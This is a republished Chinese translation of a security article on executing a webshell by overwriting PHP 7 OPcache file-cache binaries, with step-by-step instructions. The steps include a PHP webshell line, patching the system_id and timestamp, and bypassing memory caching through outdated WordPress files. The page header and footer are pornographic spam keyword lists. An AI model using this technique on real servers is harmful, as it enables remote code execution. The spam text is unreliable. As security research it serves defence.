日本不卡不码高清免费观看,久久国产精品久久w女人spa,黄色aa久久,三上悠亚国产精品一区二区三区

您的位置:首頁技術文章
文章詳情頁

利用PHP 7中的OPcache來實現(xiàn)Webshell

瀏覽:160日期:2022-09-11 15:33:32

在這篇文章中,我們將會對PHP7 OPcache引擎中的安全問題進行講解,而且還會給大家介紹一種新型的漏洞利用技術。通過這種攻擊方法,我們可以繞過某些安全強化技術,例如 禁止web目錄的文件讀寫 等安全保障措施。除此之外,攻擊者還可以利用這種攻擊技術在目標主機中執(zhí)行惡意代碼。

OPcahce

OPcache是PHP 7.0中內(nèi)嵌的新型緩存引擎。它可以對PHP腳本代碼進行編譯,并且將編譯結果以字節(jié)碼的形勢存入內(nèi)存中。

OPcache 通過將 PHP 腳本預編譯的字節(jié)碼存儲到共享內(nèi)存中來提升 PHP 的性能, 存儲預編譯字節(jié)碼的好處就是省去了每次加載和解析 PHP 腳本的開銷。

利用PHP 7中的OPcache來實現(xiàn)Webshell

除此之外,它還能提供文件系統(tǒng)的緩存功能,但是我們必須在PHP.ini配置文件中定義緩存信息的目標文件夾路徑:

opcache.file_cache=/tmp/opcache

在上面這個文件夾中,OPcache會將編譯好的PHP腳本保存在相應PHP腳本的相同目錄結構之中。比如說,需要進行編譯的代碼保存在/var/www/index.php之中,而完成編譯的代碼將會保存在/tmp/opcache/[system_id]/var/www/index.php.bin之中。

在上述文件路徑中,system_id是一個包含了當前PHP版本信息,Zend框架的擴展ID,以及各種數(shù)據(jù)類型信息的MD5 哈希值。在最新發(fā)行版的Ubuntu操作系統(tǒng)(16.04)之中,system_id是由當前Zend框架和PHP的版本號所組成的(81d80d78c6ef96b89afaadc7ffc5d7ea)。當OPcache首次對這些文件進行緩存處理時,會在文件系統(tǒng)中創(chuàng)建相應的目錄。

正如我們將會在接下來的章節(jié)中看到的,每一個OPcache文件還會在文件的header域中保存system_id的副本。

至此,我們就不得不提到OPcache文件夾了,其中一個非常有趣的地方就是,當用戶啟用了這項服務之后,用戶就會擁有OPcache生成的所有文件夾或者文件(所有文件和文件夾均位于/tmp/opcache/目錄之下)的寫入權限。

OPcache文件夾中的權限信息如下所示:

$ ls /tmp/opcache/

drwx------ 4 www-data www-data 4096 Apr 26 09:16 81d80d78c6ef96b89afaadc7ffc5d7ea

正如我們看到的那樣,www-data分組下的用戶都擁有OPcache所生成文件夾的寫入權限。如果我們擁有OPcache目錄的寫入權限,那么我們就可以重寫目錄中的緩存文件,然后利用webshell來執(zhí)行任意代碼。

攻擊場景

首先,我們必須得到緩存文件夾的保存路徑(/tmp/opcache/[system_id]),以及目標PHP文件的保存路徑(/var/www/...)。

為了讓大家更容易理解,我們假設網(wǎng)站目錄中存在一個phpinfo()文件,我們可以從這個文件中獲取到緩存文件夾和文件源代碼的存儲位置,當我們在計算system_id的時候?qū)枰玫竭@些數(shù)據(jù)。我們已經(jīng)開發(fā)出了一款能夠從網(wǎng)站phpinfo()中提取信息,并計算system_id的工具。你可以在我們的 GitHub代碼庫 中獲取到這個工具。

在此,我們需要注意的是,目標網(wǎng)站必須不能對上傳的文件有所限制。

現(xiàn)在,我們假設php.ini中除了默認的設置信息之外,還添加有下列配置數(shù)據(jù):

opcache.validate_timestamp = 0 ; PHP 7’s default is 1

opcache.file_cache_only = 1 ; PHP 7’s default is 0

opcache.file_cache = /tmp/opcache

接下來,我們就會給大家講解攻擊的實施過程:

我們已經(jīng)在網(wǎng)站中找到了一個漏洞,這個漏洞意味著網(wǎng)站不會對我們上傳的文件進行任何的限制。我們的目標就是利用包含后門的惡意代碼替換掉文件/tmp/opcache/[system_id]/var/www/index.php.bin。

利用PHP 7中的OPcache來實現(xiàn)Webshell

上圖顯示的就是包含漏洞的網(wǎng)站界面。

1.在本地創(chuàng)建一個包含Webshell的惡意PHP文件,將其命名為“index.php”:

<?php

system($_GET[’cmd’]);

?>

2.將opcache.file_cache的相關設置添加進你的PHP.ini文件之中。

3.利用php –S 127.0.0.1:8080命令啟動一個Web服務器,然后向服務器請求index.php文件,并觸發(fā)緩存引擎。在這一步中,我們只需要使用命令wget 127.0.0.1:8080就可以實現(xiàn)我們的目的了。

4.定位到我們在第一步中設置的緩存文件夾,你將會發(fā)現(xiàn)了一個名為index.php.bin的文件。這個文件就是已經(jīng)經(jīng)過編譯處理的webshell。

利用PHP 7中的OPcache來實現(xiàn)Webshell

上圖顯示的是OPcache生成的index.php.bin。

5.由于本地system_id很可能與目標主機的system_id不同,所以我們必須打開index.php.bin文件,并將我們的system_id修改成目標主機的system_id。正如我們之前所提到的,system_id是有可能被猜到的,例如暴力破解,或者根據(jù)phpinfo()文件中的服務器信息計算出來。我們可以在文件簽名數(shù)據(jù)之后修改system_id,具體如下圖所示:

利用PHP 7中的OPcache來實現(xiàn)Webshell

上圖顯示的是system_id的數(shù)據(jù)存儲位置。

6.由于目標網(wǎng)站對上傳的文件沒有任何的限制,所以我們現(xiàn)在就將文件上傳至服務器的目錄之中:

/tmp/opcache/[system_id]/var/www/index.php.bin

7.刷新網(wǎng)站的index.php,網(wǎng)站將會自動執(zhí)行我們的webshell。

利用PHP 7中的OPcache來實現(xiàn)Webshell

繞過內(nèi)存緩存(file_cache_only = 0)

如果內(nèi)存緩存的優(yōu)先級高于文件緩存,那么重寫OPcache文件并不會執(zhí)行我們的webshell。如果服務器托管的網(wǎng)站中存在文件上傳限制漏洞,那么在服務器重啟之后,我們就可以繞過這種限制。既然內(nèi)存緩存可以被清空,OPcache將會使用文件緩存來填充內(nèi)存緩存,從而達到我們執(zhí)行webshell的目的。

這也就意味著,我們還是有辦法能夠在服務器不進行重啟的情況下,執(zhí)行我們的webshell。

在WordPress等網(wǎng)站框架之中,還是會有一些過時的文件可以公開訪問到,例如 registration-functions.php 。

由于這些文件已經(jīng)過時了,所以系統(tǒng)不會再加載這些文件,這也就意味著,內(nèi)存和文件系統(tǒng)的緩存中是不可能存在有這些文件的。當我們上傳了惡意代碼(registration-functions.php.bin)之后,然后訪問相關的網(wǎng)頁(/wp-includes/registration-functions.php),OPcache就會自動執(zhí)行我們的webshell。

繞過時間戳認證(validate_timestamps = 1)

時間戳通常是一個字符序列,它可以唯一地標識某一時刻的時間。一般來說,時間戳產(chǎn)生的過程為:用戶首先將需要加時間戳的文件用Hash編碼加密形成摘要,然后將該摘要發(fā)送到DTS,DTS在加入了收到文件摘要的日期和時間信息后再對該文件加密(數(shù)字簽名),然后送回用戶。

如果服務器啟用了時間戳認證功能,OPcache將會對被請求的PHP源文件的時間戳進行驗證,如果該文件與緩存文件header域中的時間戳相匹配,那么服務器就會允許訪問。如果時間戳不匹配,那么緩存文件將會被丟棄,并創(chuàng)建出一個新的緩存文件。為了繞過這種限制,攻擊者必須知道目標源文件的時間戳。

這也就意味著,在WordPress等網(wǎng)站框架之中,源文件的時間戳是可以獲取到的,因為當開發(fā)人員將代碼文件從壓縮包中解壓出來之后,時間戳信息仍然是保持不變的。

利用PHP 7中的OPcache來實現(xiàn)Webshell

上圖顯示的是WordPress/wp-includes文件夾中的信息。

有趣的是,其中的有些文件從2012年起就再也沒有進行過任何的修改(請注意以下兩個文件:registration-functions.php和registration.php)。因此,即使是不同版本的WordPress,這些相同文件的時間戳也是一樣的。在獲取到了文件時間戳的信息之后,攻擊者就可以修改他們的惡意代碼,并且成功覆蓋服務器的緩存數(shù)據(jù)。時間戳信息位于文件開頭處的第34字節(jié)位置:

利用PHP 7中的OPcache來實現(xiàn)Webshell

演示視頻

在此,我們給大家提供了一個簡短的演示視頻,并在視頻中對攻擊步驟進行了講解:

視頻地址:https://youtu.be/x42l-PQHhbA

正如我們在此之前提到的,大家可以在我們的 GitHub代碼庫 中獲取到你們所需要的工具。

總結

總而言之,這種新型的攻擊方法并不會對使用PHP進行開發(fā)的應用程序產(chǎn)生影響,因為這并不是PHP的通用漏洞。現(xiàn)在,很多Linux發(fā)行版的操作系統(tǒng)(例如Ubuntu 16.04)都會默認安裝PHP 7,所以當我們在了解到了這種攻擊技術之后,在我們的開發(fā)過程中,更加因該謹慎地審查我們的代碼,并檢查網(wǎng)站中是否存在文件上傳限制漏洞,因為這個漏洞將會對服務器的安全產(chǎn)生影響。

本文由 360安全播報 翻譯,轉(zhuǎn)載請注明“轉(zhuǎn)自360安全播報”,并附上鏈接。

原文鏈接:http://blog.gosecure.ca/2016/04/27/binary-webshell-through-opcache-in-php-7/

標簽: PHP
相關文章:
日本不卡不码高清免费观看,久久国产精品久久w女人spa,黄色aa久久,三上悠亚国产精品一区二区三区
成人日韩av| 国产精品sm| 色婷婷精品视频| 一区二区精品伦理...| 三级在线看中文字幕完整版| 视频小说一区二区| 一区在线视频观看| 日韩av影院| 久久99高清| 欧美亚洲国产激情| 美日韩精品视频| 国产欧美丝祙| 国产传媒在线| 欧美午夜不卡影院在线观看完整版免费| 国产精品免费看| 免费在线观看精品| 国产精品调教视频| 久久久成人网| 一区二区高清| 国产一区二区三区四区大秀| 九一成人免费视频| 中文字幕日韩亚洲| 精品久久福利| 亚洲精品电影| 日韩av二区在线播放| 国产一区调教| 亚洲激情av| 欧美黑人做爰爽爽爽| 亚洲二区在线| 欧美欧美黄在线二区| 黄色欧美在线| 亚洲一区免费| 麻豆成人91精品二区三区| 欧洲激情综合| 久久xxx视频| 亚洲免费观看| 麻豆一区二区99久久久久| 欧美中文一区二区| 国产欧美一区二区色老头| 亚洲福利精品| 精品久久99| 日本中文字幕一区二区| 九色porny丨国产首页在线| 日本一区福利在线| 激情久久中文字幕| 国产精品最新| 99视频精品| 国产精品不卡| 国产亚洲一区| 蜜桃视频在线观看一区| 日韩精品免费一区二区三区| 国产精品一区二区三区美女 | 尤物在线精品| 精品欧美视频| 日本aⅴ亚洲精品中文乱码| 久久九九国产| 久久精品国产免费| 日本中文字幕视频一区| 中文字幕系列一区| 欧美国产极品| 日本a口亚洲| 丝袜脚交一区二区| 国产99精品| 成人午夜精品| 黄色在线观看www| 麻豆一区二区三| 欧美一区激情| 日韩精品亚洲一区二区三区免费| 欧美日韩一二| 成人va天堂| 亚洲黄色免费看| 精品国产鲁一鲁****| 久久狠狠久久| 综合国产视频| 视频一区中文字幕| 欧美不卡高清| 天堂√中文最新版在线| 麻豆成人在线观看| 国产乱码精品一区二区三区亚洲人| 久久不射中文字幕| 99riav国产精品| 亚洲国产专区校园欧美| 久久久人人人| 亚洲精品国产嫩草在线观看| 福利一区二区三区视频在线观看| 国产精品一卡| 国产精品一二| 国产黄色一区| 日韩精品电影一区亚洲| 综合国产精品| 日韩三区四区| 国产区精品区| 欧美成人精品午夜一区二区| 国产精品男女| 久久只有精品| 九九九精品视频| 精品久久精品| 私拍精品福利视频在线一区| 久久久精品五月天| 欧美精品一区二区三区精品| 99在线精品视频在线观看| 免费久久精品视频| 日韩欧美高清一区二区三区| 一区二区电影| 国产精品一国产精品k频道56| 国产乱人伦丫前精品视频| 国产精品白丝久久av网站| 久久久久久亚洲精品美女| 国产一区二区精品福利地址| 岛国av在线网站| 免费av一区二区三区四区| 91久久久久| 日韩国产91| 国产精品高潮呻吟久久久久| 9999国产精品| 一区久久精品| 亚州欧美在线| 美女视频一区在线观看| 电影91久久久| 99热精品久久| 美女精品在线| 国产欧美一区二区色老头| 国产一区二区三区四区五区传媒| 久久久人人人| 日本一区二区三区中文字幕| 久久精品理论片| 亚洲欧洲日本mm| 国产欧美综合一区二区三区| 中文一区一区三区高中清不卡免费| 亚洲成人日韩| 日本麻豆一区二区三区视频| 麻豆成全视频免费观看在线看| 好吊日精品视频| 日韩欧美精品一区二区综合视频| 欧美精品不卡| 不卡在线一区二区| 国产欧美在线| 欧美日韩激情在线一区二区三区| 亚洲精品看片| 日韩精品1区| 青草国产精品久久久久久| 亚洲爱爱视频| 欧美日本不卡高清| 久久精品国产www456c0m| 日本不卡高清| 亚洲成人不卡| 日韩视频1区| 久久精品成人| 91欧美极品| 国产高清一区| 老牛国内精品亚洲成av人片| 欧美日韩少妇| 国产一区二区三区天码| 亚洲乱码久久| 日韩一区二区三区免费播放| 亚洲精品护士| 色网在线免费观看| 国产精品一区二区三区四区在线观看 | 精品捆绑调教一区二区三区| 亚洲资源在线| 亚洲韩日在线| 久久男人av| 日韩激情视频网站| 免费精品国产的网站免费观看| 国产精品视频一区二区三区四蜜臂 | 久久精品99国产精品日本| 国产精品7m凸凹视频分类| 欧美国产视频| 亚洲免费毛片| 99久久精品国产亚洲精品| 奇米狠狠一区二区三区| 亚洲一区二区动漫| 在线视频观看日韩| 福利片在线一区二区| 欧美亚洲tv| 蜜桃视频在线观看一区| 欧美在线观看视频一区| 精品视频97| 国产精品手机在线播放| 中文字幕av一区二区三区人 | 麻豆视频一区| 日韩一区二区三区精品| 好看的av在线不卡观看| 久久国产主播| sm捆绑调教国产免费网站在线观看| 亚洲精品一级二级三级| 午夜精品影院| 亚洲午夜电影| 久久久久.com| 欧美日韩视频网站| 国产欧美自拍| 国产日韩欧美一区| 四虎国产精品免费久久| 热久久国产精品| 国产精品丝袜xxxxxxx| 国产精品99免费看| av亚洲免费| 黄色成人在线网址| 国产精品美女久久久浪潮软件| 亚洲午夜电影|